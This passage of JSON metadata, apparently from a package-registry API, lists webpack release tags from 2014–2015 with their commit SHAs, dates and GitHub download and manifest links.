ck/releases/tag/v1.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8/manifests"},{"name":"v1.9.7","sha":"0990aaa4754969e34184657577389b88fd845e87","kind":"tag","published_at":"2015-05-17T17:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7/manifests"},{"name":"v1.9.6","sha":"c5eceb0b2cf31fca84e724d3893d44c7042b9038","kind":"tag","published_at":"2015-05-15T15:24:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6/manifests"},{"name":"v1.9.5","sha":"e37a50683f74d6996373186db757289256a41bf7","kind":"tag","published_at":"2015-05-12T19:21:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5/manifests"},{"name":"v1.9.4","sha":"ac84ef731540635f615438cc8f4424ff63003ce1","kind":"tag","published_at":"2015-05-10T16:45:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4/manifests"},{"name":"v1.9.3","sha":"c7ac77fc907950dcf0dc355fae86164f688f9857","kind":"tag","published_at":"2015-05-10T14:44:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3/manifests"},{"name":"v1.9.2","sha":"0576143e96be118e4621f79db4b8d03b6d2c808e","kind":"tag","published_at":"2015-05-10T12:37:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"98663e71dbacfb82e02379671a821a373150dc7c","kind":"tag","published_at":"2015-05-10T11:53:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"0e21e6ec0b2e4ebc085c9e6ccf823480384e3943","kind":"tag","published_at":"2015-05-10T10:23:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0/manifests"},{"name":"v1.8.11","sha":"f7d7d30ee647dd8fc77972752d5b9fc47bbe09ea","kind":"tag","published_at":"2015-04-29T10:49:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11/manifests"},{"name":"v1.8.10","sha":"8e490bdee33dd4edea82c6d13ba80c6fe3246218","kind":"tag","published_at":"2015-04-26T20:50:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10/manifests"},{"name":"v1.8.9","sha":"e4453c78edb4613804c0c0a0e9f447d2def533c3","kind":"tag","published_at":"2015-04-21T21:34:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9/manifests"},{"name":"v1.8.8","sha":"924e02c98aba21b65d913a1f0e16d8818f018c3b","kind":"tag","published_at":"2015-04-21T06:38:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8/manifests"},{"name":"v1.8.7","sha":"0bc887a06c7f34a95e2756097f193f15ec1a443d","kind":"tag","published_at":"2015-04-20T18:51:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7/manifests"},{"name":"v1.8.6","sha":"a27641f8cc68ec557d9ca524afbbfb3b34ec2408","kind":"tag","published_at":"2015-04-20T17:46:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6/manifests"},{"name":"v1.8.5","sha":"53a534663446bfaa8fc4b3c202542d6a8a2aaadc","kind":"tag","published_at":"2015-04-17T08:26:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5/manifests"},{"name":"v1.8.4","sha":"bffe6037e99c7a741d64414368295b026d81c81a","kind":"tag","published_at":"2015-04-10T08:23:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4/manifests"},{"name":"v1.8.3","sha":"13c3a3c3445ac9b76f3fe2602963e8748673b458","kind":"tag","published_at":"2015-04-09T22:19:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3/manifests"},{"name":"v1.7.4","sha":"43a12294470d9e0337a325095e0fd4a3669ed6c6","kind":"tag","published_at":"2015-04-09T22:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4/manifests"},{"name":"v1.8.2","sha":"4c2b7a9ea5b45481ad408c8275ef58e6140a038f","kind":"tag","published_at":"2015-04-08T13:12:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"af22dce84cb13facf372f179a6a174cafa0397dd","kind":"tag","published_at":"2015-04-08T06:11:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"1f74f58273ae008e315275c6caa31ae3fad42551","kind":"tag","published_at":"2015-04-07T12:34:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0/manifests"},{"name":"v1.7.3","sha":"b1da5ed5c69f02cb9a4215a56157267b1de9a11b","kind":"commit","published_at":"2015-03-11T22:50:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"17d9dc161c7c8f969d83cb8503fead40db9798d9","kind":"commit","published_at":"2015-03-04T06:45:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"d09c8e713823c705cefea77bc34db6ab0e1cc0c3","kind":"commit","published_at":"2015-03-03T22:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1/manifests"},{"name":"v1.7.0","sha":"e5b5fa6da79def97ac6c1017f3595fcefd5a74dd","kind":"commit","published_at":"2015-03-03T19:43:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0/manifests"},{"name":"v1.6.0","sha":"ad81998305456c8447ce09d5ef2d4c950f7a4184","kind":"commit","published_at":"2015-02-23T22:02:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0/manifests"},{"name":"v1.5.3","sha":"e46e5cbc514b17cc893dde394edc9a8a25baa5eb","kind":"commit","published_at":"2015-01-21T19:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"bdabadf34f871fd19b1f960df6b8ab15ea915154","kind":"commit","published_at":"2015-01-21T19:25:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"558ee89277d41529ff143af8e050f4c2917ea4b6","kind":"commit","published_at":"2015-01-17T23:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"0e36e7e936b126dba526bddac557566ee982c432","kind":"commit","published_at":"2015-01-17T22:43:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0/manifests"},{"name":"v1.4.15","sha":"431bd659be6dcd35fbe993a3a528d5774e82f745","kind":"commit","published_at":"2014-12-28T00:26:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15/manifests"},{"name":"v1.4.14","sha":"6c45e24e4039f7298bfa8ca08a9614abc7aeaf08","kind":"commit","published_at":"2014-12-22T14:29:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14/manifests"},{"name":"v1.4.13","sha":"34c509740b722ac9898ed262f88a8bba9d3237b7","kind":"commit","published_at":"2014-11-05T23:28:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13/manifests"},{"name":"v1.4.12","sha":"5edcaea76d900134a50e5a16a07ab5da75c80c6a","kind":"commit","published_at":"2014-11-03T07:10:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12/manifests"},{"name":"v1.4.11","sha":"8c606b490b248000466cc5be01019ce7d2eea407","kind":"commit","published_at":"2014-11-02T12:18:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11/manifests"},{"name":"v1.4.10","sha":"9a375a770a9b1b235361dcda92844acad196dd47","kind":"commit","published_at":"2014-10-31T11:46:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10/manifests"},{"name":"v1.4.9","sha":"b02ef8b2c386d34441af4b42aab248aeed014214","kind":"commit","published_at":"2014-10-26T10:19:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9/manifests"},{"name":"v1.4.8","sha":"c6e1a8fb6d8714dec5bd05b7a6ae80b71b6e0262","kind":"commit","published_at":"2014-10-16T20:31:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8/manifests"},{"name":"v1.4.7","sha":"4c0e1974e5c49ee4063cf301d49dc977f77a85b6","kind":"commit","published_at":"2014-10-13T14:10:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7/manifests"},{"name":"v1.4.6","sha":"f0997230f35361ab62c2300133aece93f3ca1cc3","kind":"commit","published_at":"2014-10-12T10:30:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"272d7219cdec5f041e98e2163078c6d2ea772bdf","kind":"commit","published_at":"2014-10-07T13:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5/manifests"},{"name":"v1.4.4","sha":"2bcb6f9bca77d5d4a42efface7c1e274412b5b64","kind":"commit","published_at":"2014-09-26T06:54:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"91c7426e4595f0d3c45efc9c1e17b40d875e6de2","kind":"commit","published_at":"2014-09-23T06:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3/manifests"},{"name":"v1.4.2","sha":"c117ec46eaa149d3732157744467e58b2baf4517","kind":"commit","published_at":"2014-09-22T21:51:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2/manifests"},{"name":"v1.4.1-beta1","sha":"c59727720e4bf1feb5a1939b69154ceec0111ed0","kind":"commit","published_at":"2014-09-19T06:13:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1/manifests"},{"name":"v1.4.0-beta10","sha":"4afdc81bc4fa95fad705957f335ab48c6f7feb9a","kind":"commit","published_at":"2014-09-17T21:25:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10/manifests"},{"name":"v1.4.0-beta9","sha":"4e79c9f245c3df0173cb75312cde5f1c51c902f6","kind":"commit","published_at":"2014-09-16T17:36:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta9","tag_url":"https://repos.ecosyste.m